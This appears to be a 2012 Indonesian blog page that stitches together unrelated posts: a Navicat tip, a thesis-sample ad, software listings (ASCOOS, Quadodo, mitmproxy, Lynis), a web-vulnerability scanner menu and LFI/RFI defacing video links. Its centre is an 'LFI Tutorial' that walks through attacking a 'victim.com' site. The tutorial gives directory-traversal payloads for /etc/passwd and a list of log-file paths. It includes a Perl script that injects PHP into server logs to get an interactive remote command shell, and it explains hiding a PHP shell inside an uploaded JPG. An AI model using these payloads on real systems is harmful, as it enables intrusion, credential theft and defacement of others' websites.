Latest Post

Cara membuat query php dengan NAVICAT

Written By Unknown on Sunday 30 September 2012 | 23:01

Membuat query php dengan NAVICAT
Cara membuat   inner join table dengan menggunakan NAVICAT
cara ini memang sangat mudah ketimbang dengan kita ketik sendiri akan memakan waktu yang cukup lama ,dengan menggunakan bantuan software navicat terasa mudah berikut beberapa contoh menggunakan software navicat


Untuk lebih jelasnya anda praktekin sendiri karana akan lebih mudah untuk pemahamannya 

Semoga bisa bermanfaat .


10 Good & Free VPN

A compact Web Apps Vulnerable Scanner for amateur pentester [SecScan]

In window OS you need to install python language.

++++++++++++++++++++++++++++++++++
+ = Advance Web Apps Scanner = +
+ +
+ by +
+ +
+ Black Tiger Security +
+ +
+ now available +
+ +
+ in public Posted Image +
++++++++++++++++++++++++++++++++++

Please choose one of these options below (enter numbers only):

=== Scanners:

[[READ: you don't have to enter
inurl, just stuff like
index.php?id= or .aspx?id=]]

[1] SQLi
[2] LFI
[3] XSS
[4] RFI

=== Other Tools:

[5] Route Checker
[6] Admin Page Finder
[7] Sub Domain Scan
[8] Dic MD5 cracker
[9] Online/Rainbow MD5 cracker
[10] Check local IP address 

  
https://code.google..../downloads/list

 
credit : BTsecruity 

Contoh Tesis Manajemen Pendidikan

Klik disini untuk mendapatkan berbagai Contoh Tesis Manajemen Pendidikan. Pendidikan tidak bisa lepas dari kehidupan kita. Karena pendidikan merupakan hal yang sangat penting bagi setiap orang. Ilmu pendidikan merupakan ilmu yang luas karena memiliki berbagai kategori, salah satunya adalah Ilmu Manajemen Pendidikan. Untuk membuat suatu penelitian tentang ilmu manajemen pendidikan tidak lepas dari penggunaan referensi. Dalam hal ini kami dapat membantu Anda dalam menemukan referensi yang sesuai dengan tema yang Anda angkat. Kami menyediakan referensi tentang ilmu manajemen pendidikan dalam daftar Contoh Tesis Manajemen Pendidikan. Dalam daftar tersebut tersaji berbagai macam studi kasus yang berbeda dan menarik sehingga layak digunakan sebagai referensi tesis ilmu manajemen pendidikan Anda. 



kumpulan tesis manajemen pendidikan ini merupakan topik online tentang pembahasan manajemen pendidikan. Banyak penyedia tesis manajemen pendidikan yang bisa di dapat dengan cara mendowload.


Seperti dalam blog http://www.ilmiahpendidikan.com/p/tesis-pendidikan.htmlAnda bisa mencari contoh berbagai tesis manajemen pendidikan, tesis manajemen sumber daya manusia, MSDM, manajemen pemasaran dan berbagai macam tesis lainnya.
 
Atau Anda bisa juga berkunjung ke http://www.ilmiahpendidikan.com/p/tesis-pendidikan.htmldi mana blog tersebut mengklaim sebagai Penyedia Layanan Online yang berisi informasi Tesis Skripsi Manajemen Sumber Daya Manusia, tesis Manajemen untuk bidang Pemasaran, tesis Manajemen bidang Pendidikan, serta tesis Manajemen Keuangan dan lain lain.

atau di
http://www.ilmiahpendidikan.com/p/tesis-pendidikan.html yang juga sebagai tempat Kumpulan Contoh Tesis Manajemen Sumber Daya Manusia, Tesis Manajemen Pemasaran, Tesis Manajemen Keuangan, Tesis Manajemen Akuntansi, Tesis Ilmu Sosial dalam bentuk MS WORD

Berikut Contoh Koleksi Tesis Manajemen Pendidikan Untuk Bisa Dijadikan Referensi.

ASCOOS Web Server (AWS) V1.3.15

The AWS is a special version of web server for all Web Developers and Web Designers and is based on Apache, Perl, multiple versions of PHP and MySQL, PostgreSQL, Filezilla, phMyAdmin, phpPgAdmin, eXtplorer.... etc... Installation in C:\

Features 

  • ASCOOS Web Server GUI Control 1.3.15
  • ASCOOS Web Server - Web Control Information (WCI) 0.1 beta5
  • Multilanguage, Skins
  • Apache 2.2.22
  • OpenSSL 1.0.1c
  • Filezilla FTP Server 0.9.41
  • Three (3) PHP Versions (5.2.17 - 5.3.17 - 5.4.7)
  • IonCube PHP encoder loaders 4.2.2 for PHP 5.2 - 5.3 - 5.4
  • Perl 5.16.1
  • Cache Accelerators: APC, eAccelerator, MemCache
  • Three (3) MySQL Database versions (5.1.66 - 5.5.28 - 5.6.7-rc)
  • PostgreSQL Database 9.1.6
  • MongoDB Database 2.0.7
  • Multiple SQLite Versions (2 and 3)
  • phpMyAdmin 3.5.2.2 - Web Interface for MySQL
  • phpPgAdmin 5.0.4 - Web Interface for PostgreSQL
  • rockMongo 1.1.0 - Web Interface for MongoDB
  • eXtplorer 2.1.0 RC5 - Web File Manager
  • browscap.ini version 5015
Updated to ASCOOS WEB SERVER 1.3.15 on 30/09/2012
Download ASCOOS WEB SERVER 1.3.15 (249.4 MB)
Download other versions from here

Source -
http://sourceforge.net/projects/awserver/

Visit website -
http://aws.ascoos.com/

Previous post regarding ASCOOS -
http://santoshdudhade.blogspot.in/2012/08/ascoos-web-server-aws-version-1313.html
http://santoshdudhade.blogspot.in/2012/08/ascoos-web-server-aws-v1311.html
http://santoshdudhade.blogspot.in/2012/06/ascoos-web-server-aws.html

Screenshot -



Quadodo Login Script - PHP Login Script

The Quadodo Login Script is a free open-source php login script written in PHP and SQL. It is a stand-alone system and is one of a kind. This free login script is for anyone who wishes to allow users to sign up for their site. It comes with loads of features that include:
  • Cookies or Sessions
  • In-Depth Administration Panel
  • MySQL or PostgreSQL
  • Permission Masks
  • Grouping System
  • Paging System
  • Block Access to Public
  • Easily Integrated
  • Muliple Languages
  • Many More...
Download -
Quadodo Login Script Version: 3.1.9
Documentation: ChangeLogUser GuideLicenseAbout
Released: March 11th, 2008
Full Downloads: qls-3.1.9.zipqls-3.1.9.tar.bz2qls-3.1.9.tar.gz
Changed Files Only: qls-3.1.9-cha...only.zipqls-3.1.9-cha...only.tar.bz2qls-3.1.9-cha...only.tar.gz


Source -
http://sourceforge.net/projects/qls/

Visit Website -
http://www.quadodo.net/

Screenshot -

LFI and RFI videos tutorials

Basic Example of Local File Intrusion (LFI)





Remote File Inclusion Vulnerability[RFI] Hack





Shell upload via SQLi & LFI

 

 

 

 Local File Inclusion + Remote File Inclusion Defacing by 1nj3cth4x / Darkc0ke (HD)

 

credit to uploaders 

LFI Tutorial (local file inclusion)

Written By Unknown on Friday 28 September 2012 | 15:43

This tutorial will guide you into the process of exploiting a website thru the LFI (Local File Inclusion).

First lets take a look at a php code that is vulnerable to LFI:
Code:
$page = $_GET[page];
include($page);
?>
Now, this is a piece of code that should NEVER be used, because the $page isn't sanitized and is passed directly to the webpage, but unfortunately (or not ) is very common to be find in the www world.

Ok, now that we know why is it vulnerable let's start to use this in our advantage. First let's take a look how this give us the ability to "browse" thru the web server. Let's imagine theres a file called test.php inside the test directory, if you type victim.com/test/test.php will retrive that file correct? Ok, but if the php code that we examined was in the index.php we could also retrive that file thru victim.com/index.php?page=test/test.php , see what happened there? Now, if the index.php was in victim.com/test/index.php and the test.php in victim.com/test.php you will have to type victim.com/test/index.php?page=../test.php . The ../ is called directory
transversal using that will allow you to go up in the directories.


Now that we can go up and down thru the server let's use it to access files that we are not supposed to. If this was hosted in a Unix server we can then possibly view the password file of the server, to do this you will have to type something like this (the nr of ../ may vary depending of where the vulnerable file is):
Code:
victim.com/index.php?page=../../../../../../../etc/ passwd
If you don't know what to do with the content of etc/passwd then continue reading! The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:



username: passwd:UID:GID:full_name:directory:shell

For example:


username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh

All you need to do then is grab the username and decode the password. If the passwd file is shadowed then you'll see something like this:


username:x:503:100:FullName:/home/username:/bin/sh

As you can see the password is now a x and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many
processes, thats why you have access to it).

You can also sometimes see something like this:



username:!:503:100:FullName:/home/username:/bin/sh

The ! indicates that the encoded password is stored in the etc/security/passwd file.

Heres a couple of places that may be interesting to "visit":
Code:
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
You will probably need to google for it as this is not the right tutorial to it.

Just one more quick thing, its also common to find a vulnerable code like:
Code:
$page = $_GET["page"];
include("$page.php");
?>
In this case as you can see it will add a .php in the end of whatever you include! So if you type in your browser:
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
it will retrieve:
victim.com/index.php?file=../../../../../../../../ etc/passwd.php that file don't exist, and you will see an error message, so you need to apply the null byte ():
Code:
victim.com/index.php?file=../../../../../../../../ etc/passwd
With the null byte the server will ignore everything that comes after .



There are other ways to use the LFI exploit, so continue reading, the REALLY fun is about to begin!


We will now gonna try to run commands on the server, we will do this by injecting php code in the httpd logs and then access them by the LFI! To do this first find out where the logs are stored, here is some locations that may be useful to you:
Code:
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
Ok, now that you know where the logs are take a look at them and see what they store, at this example we will use a log that stores the "not found files" and the php code . You will then type at your browser victim.com/ and the php code will be logged because it "dosen't exist".

This possibly won't work because if you go look into the log you will probably see the php code like this:
Code:
%3C?%20passthru($_GET[cmd])%20?>
because your browser will url encode the whole thing! So you'll need to use something else, if you don't have a script of your own you can use this perl script i've wrote:
Code:
#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path.$code." HTTP/1.1
";
print $socket "User-Agent: ".$code."
";
print $socket "Host: ".$site."
";
print $socket "Connection: close

";
close($socket);
print "
Code $code sucssefully injected in $log
";

print "
Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "
Connection Failed.

";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1
";
print $socket "Host: ".$site."
";
print $socket "Accept: */*
";
print $socket "Connection: close

";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}
Copy/paste that, save it as whatever.pl and change what is in bold accordingly to your victim site. If the vulnerable code is in victim.com/main/test.php you should change the /folder/ to /main/ , index.php= to test.php= and the ../../../../../../../etc/httpd/logs/error_log to where the log is at!

That script will inject the code and then will ask you for a command to run on the server! You know what to do now!


Last but not least we will take a look on how to use the avatar/image upload funtion found in a lot of web aplications.
You possibly have seen this in the "Local JPG Shell injection video" at milw0rm, but the best part here that was not mentioned is that the web aplication DOES N'T need to be installed on your victim website!

This is a quick explanation, for a better understanding you can view the video at :
Code:
http://www.milw0rm.com/video/watch.php?id=57
OR, IF you want a private way to upload shell in the server visit this link :
Code:
http://per1ova.com/showthread.php?t=400
This article is in the PREMIUM AREA so you need to be a VIP member

You need to "insert" the php code you want to execute inside the image, to do this you'll need to use your favorite hex editor or you can use the edjpgcom program (all you need to do is right click on the image, open with..., then select the edjpgcom program and then just type the code). Ok now that you have your shell in the image all you need to do is upload it! If your victim.com has a forum or something else that allows you to upload great, if not check if its in a shared hosting, if so do a reverse lookup on it!


Now that you have a list of potential sites that may have a forum or something else that allows you to upload your image all you need to do is take some time to browse thru them until you find one!


After you found one and have uploaded your image here is tricky part, you'll need to "create" an error on it (in order to find the server path to it)! Try per example create an mysql error and you will get something like this:
Code:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/sitefolder/public_html/includes/view.php on line 37
If you can't force an error go back to the etc/passwd file:

Code:
username:kbeMVnZM0oL7I:503:100:FullName:/home/username:/bin/sh
As you can see the username is also the directory name, most of the times the name is similar to the domain name, but if not the case you'll have to try them until you find the one you're looking for!


Go to your avatar image right click on it and then properties (write down the path to it), you'll now all set up.

In your browser type this (again, the nr of ../ may vary):
Code:
victim.com/index.php=../../../../../../../../../ho me/the_other_site_dir/public_html/path_to_your_avatar/avatar.jpg
In order "words" should look like this (using fictitious "names"):

Code:
victim.com/index.php=../../../../../../../../../ho me/arcfull/public_html/forum/uploads/avatar.jpg
After you type this you will see the result of the code inserted in the image!


source : http://penetrationengineer.blogspot.com/ 

mitmproxy - an SSL-capable man-in-the-middle proxy

mitmproxy is an SSL-capable man-in-the-middle proxy for HTTP. It provides a console interface that allows traffic flows to be inspected and edited on the fly.

mitmdump is the command-line version of mitmproxy, with the same functionality but without the user interface. Think tcpdump for HTTP.

  • Features 
  • Intercept HTTP requests and responses and modify them on the fly. 
  • Save complete HTTP conversations for later replay and analysis. 
  • Replay the client-side of an HTTP conversations. 
  • Replay HTTP responses of a previously recorded server. 
  • Reverse proxy mode to forward traffic to a specified server. 
  • Make scripted changes to HTTP traffic using Python. 
  • SSL certificates for interception are generated on the fly.
Install

The easiest way to install the latest release of mitmproxy is to use pip: pip install mitmproxy

For further instructions, see the Installation section of the documentation.

Download
Requirements
  • The following auxiliary components may be needed if you plan to hack on mitmproxy: 
  • The test suite uses the pry unit testing library. 
  • Rendering the documentation requires countershape
  • mitmproxy is tested and developed on OSX, Linux and OpenBSD. Windows is not supported at the moment. 
  • You should also make sure that your console environment is set up with the following: 
  • EDITOR environment variable to determine the external editor. 
  • PAGER environment variable to determine the external pager. 
  • Appropriate entries in your mailcap files to determine external viewers for request and response contents. 
Source -
http://mitmproxy.org/index.html
Screenshot -

Lynis - Security and system auditing tool

Lynis is an auditing tool for Unix (specialists). It scans the system and available software, to detect security issues. Beside security related information it will also scan for general system information, installed packages and configuration mistakes.

This software aims in assisting automated auditing, software patch management, vulnerability and malware scanning of Unix based systems. It can be run without prior installation, so inclusion on read only storage is no problem (USB stick, cd/dvd).

Lynis assists auditors in performing Basel II, GLBA, HIPAA, PCI DSS and SOX (Sarbanes-Oxley) compliance audits.

Intended audience:
Security specialists, penetration testers, system auditors, system/network managers.

Examples of audit tests:
- Available authentication methods
- Expired SSL certificates
- Outdated software
- User accounts without password
- Incorrect file permissions
- Firewall auditing


System requirements:

- Compatible operating system (see 'Supported operating systems')
- Default shell
Supported operating systems
Tested on:
- Arch Linux
- CentOS
- Debian
- Fedora Core 4 and higher
- FreeBSD
- Gentoo
- Knoppix
- Mac OS X
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- OpenSuSE
- PcBSD
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10
- Ubuntu
Downloads

1.3.0 - Latest release
1.2.9 - Previous release

Packages

Lynis RPM (spec)
Non-official RPM's (by Peter Linnell) 
Debian package
Lynis Demo


Documentation


Source -

http://www.rootkit.nl/projects/lynis.html

Screenshot -


 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger